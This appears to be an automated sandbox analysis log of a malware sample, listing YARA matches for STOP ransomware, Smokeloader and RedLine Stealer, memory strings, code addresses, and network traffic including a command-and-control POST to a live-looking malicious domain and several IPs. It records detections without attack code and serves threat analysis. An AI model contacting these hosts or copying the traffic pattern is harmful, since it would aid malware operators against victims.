0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.536124394.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534965935.00000000023D2000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.522481336.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.522569046.00000000023E1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.534980843.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547934832.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566738501.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.536124394.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.522569046.00000000023E1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com38 equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com< equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com@? equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.537557430.000000000237A000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comB^a5! equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.537557430.000000000237A000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comHTEP equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comRCHAR equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comTEGER equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comY equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comcs| equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comhtep equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.coms equals www.facebook.com (Facebook)
Source: 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmedenoe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: furubujjul.net

Source: unknown	HTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49718 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match	File source: 5.2.thduhcf.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.710e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.thduhcf.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.thduhcf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: file.exe, 00000000.00000002.431305052.00000000008BA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match	File source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6246.exe PID: 5608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6246.exe PID: 1420, type: MEMORYSTR

System Summary

Source: 8.0.6246.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000000.492089857.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.505319031.0000000000841000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000000.496174295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.531881974.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000000.499526693.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.572802544.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.503555817.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.533230788.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.532778418.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.500012370.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.575526582.0000000000851000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.531437946.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000E.00000000.490370694.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000000.494940938.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000000.499882815.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.425983176.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000000.493912114.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000000.500354218.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 6246.exe PID: 5608, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 6246.exe PID: 1420, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: C:\Users\user\AppData\Local\Temp\7795.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004022E9		0_2_004022E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00419416		0_2_00419416
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041BC3D		0_2_0041BC3D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E4F0		0_2_0040E4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041995A		0_2_0041995A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041064C		0_2_0041064C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004146E9		0_2_004146E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00419E9E		0_2_00419E9E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409B40		0_2_00409B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414F92		0_2_00414F92
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041539E		0_2_0041539E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414BBE		0_2_00414BBE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004157BE		0_2_004157BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C117D		0_2_008C117D
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_0041996A		4_2_0041996A
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_00409B50		4_2_00409B50
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_00414BCE		4_2_00414BCE
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_004153AE		4_2_004153AE
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_0041BC4D		4_2_0041BC4D
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_00419426		4_2_00419426
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_0040E500		4_2_0040E500
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_0041A5A6		4_2_0041A5A6
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_0041065C		4_2_0041065C
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_004146F9		4_2_004146F9
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_004157CE		4_2_004157CE
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Code function: 4_2_00414FA2		4_2_00414FA2

Source: C:\Windows\explorer.exe

Section loaded: taskschd.dll

Jump to behavior

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.0.6246.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
